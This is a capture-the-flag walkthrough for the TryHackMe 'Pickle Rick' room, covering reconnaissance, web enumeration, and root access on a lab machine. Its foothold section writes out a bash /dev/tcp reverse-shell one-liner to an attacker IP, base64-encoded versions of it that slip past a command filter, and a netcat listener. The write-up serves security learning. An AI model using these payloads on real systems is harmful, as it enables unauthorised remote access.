Pickle Rick [TryHackMe]

A Rick and Morty CTF. Help turn Rick back into a human!

✔️ information gathering

Rustscan

IP: 10.10.96.144

╭─root@kali ~  
╰─➤  rustscan -a 10.10.96.144 --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.96.144:22
Open 10.10.96.144:80

nmap :

╭─root@kali ~  
╰─➤  nmap -sV -sC -T 5 10.10.96.144   
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-28 02:45 EST
Nmap scan report for 10.10.96.144
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 22:f5:9e:38:f6:96:a1:51:ee:b0:4f:89:01:eb:4c:65 (RSA)
|   256 47:de:9f:13:9e:92:56:10:36:68:6b:36:a0:22:34:93 (ECDSA)
|_  256 b8:53:92:c2:a0:04:86:73:be:f7:29:ae:ab:84:c1:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds

open ports :

22:ssh
80:http

port 80

after visiting , i didn't get anything useful , but somehow the page is giving hint to use burpsuit !!
after visiting the page source i got this :

this is the one of the username , possibly we might find the password of it and can get into system using open ssh port

dirsearch :

╭─root@kali ~  
╰─➤  dirsearch -u 10.10.96.144 -w /usr/share/wordlists/dirb/common.txt -t 64
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 64 | Wordlist size: 4613
Output File: /root/.dirsearch/reports/10.10.96.144/_21-12-28_02-46-51.txt
Error Log: /root/.dirsearch/logs/errors-21-12-28_02-46-51.log
Target: http://10.10.96.144/
[02:46:51] Starting: 
[02:46:58] 301 -  313B  - /assets  ->  http://10.10.96.144/assets/
[02:47:05] 200 -    1KB - /index.html                            
[02:47:11] 200 -   17B  - /robots.txt                    
[02:47:11] 403 -  300B  - /server-status

lets try to visit /robots.txt :

seems like a wired string , could be a possible password !!

as we have already seen port 22 (ssh) is open lets try to login with the username and password .

username : R1ckRul3s
password : Wubbalubbadubdub

we get permission denied on the public key, possibly they have configure the ssh on the server to not to user password based authentication.
so , we are not able to login .

lets vsit /assets :
seems like there is web directory listing available :

some of the images , gives us hint that there might be some kind of portal on the webserver that we are missing.

now we can either run nikto scan to enumerate the web server and can also run gobuster to find the .php files , since the web server is apache

lets try to run the gobuster to find the files on webserver that have the extension .php

╭─root@kali ~  
╰─➤  gobuster dir -u 10.10.209.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php -t 60 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.42
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/28 04:14:17 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 313] [--> http://10.10.209.42/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                   
Progress: 55330 / 441122 (12.54%)                                               ^C
[!] Keyboard interrupt detected, terminating.
                                                                                 
===============================================================
2021/12/28 04:17:45 Finished
===============================================================

found some interesting files : portal.php

lets try to visit it :

✔️ foothold (initial access)

now we have the user name and password , lets try to login to the portal

and yes , we are able to login to the portal

on portal , seems like we have the functionally of running the system command , cool right ?

i think we have our first ingredient over her

but when we try to see the content of the flag , we were not able to do so , seems like there is some server side blocking has been configured .

we can bypass it , by obfuscating our command in base64 format , running the below command will give us the result :

echo Y2F0IFN1cDNyUzNjcmV0UGlja2wzSW5ncmVkLnR4dAo= | base64 -d | bash

we also have clue.txt file in the list : can view the content of it in the same way

echo Y2F0IGNsdWUudHh0Cg== | base64 -d | bash

we got the following clue :

Look around the file system for the other ingredient.

instead of looking the filesystem , lets try to get the reverse shell

server side filter bypass :

we will be base64-obfuscating the following command and pass it to server to get rev shell:

bash -i >& /dev/tcp/10.9.10.3/9001 0>&1

(please change your tun0 IP accordingly )

but before that , first set up your listener using

nc -lvp 9001

now run the following command on the website :

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC85MDAxIDA+JjE= | base64 -d | bash

seems like it doesn't work , lets try to change our payload to this :

bash -i >& /dev/tcp/10.9.10.3/9001 0>&1

now instead of using bash binary lets , use the sh binary

we can execute the following command on the website :

echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuOS4xMC4zLzkwMDEgMD4mMQ== | base64 -d | bash

and now we got the rev shell :

(note : i am using rlwrap , so that i get more out of my rev shell , like running the previous command and move backword , though we can use pwncat which is excellent alternative , for just for now lets use rlwarp)

stabilizing the shell

the mostly used way of stabilizing the shell is by the help of python , lets first try to check it python is installed the remote system or not !!

and we have the python3 install , run the following commands to get stablize shell:

$ python3 -c "import pty;pty.spawn('/bin/bash')"
$ export TERM=xterm

we could possibly find the second ingredient in /home/rick directory

✔️ privilege escalation :

running the sudo -l on system , we got this :

we can run the any command as root , pretty easy right ?

now we can get the 3rd ingredient

THANK YOU FOR READING MY WRITE UP !! 👊👊

please support me by following me on medium : https://surya-dev.medium.com/

you guys can subscribe me 🙌on YouTube : i post walkthrough and other ethical hacking related videos there.

some of my other writeups are below :

Year of the Fox [Tryhackme]

Simple CTF

Principles of Security [TryHackMe]

keygenme-py [picoCTF]

Pentesting Fundamentals+ [Jr Penetration Tester]